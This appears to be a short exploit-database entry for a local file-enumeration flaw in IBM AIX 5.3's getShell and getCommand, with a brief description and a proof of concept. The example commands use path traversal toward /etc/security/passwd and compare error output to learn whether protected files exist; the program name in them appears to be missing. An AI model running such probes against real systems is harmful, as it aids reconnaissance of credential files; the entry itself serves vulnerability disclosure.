IBM AIX 5.3 GetShell and GetCommand File Enumeration Vulnerability

ID: 56983
Download vulnerable application: None

IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.

-bash-3.00$./ ../../../../../../etc/security/passwd
-bash-3.00$./ ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
1-4-2 (www02)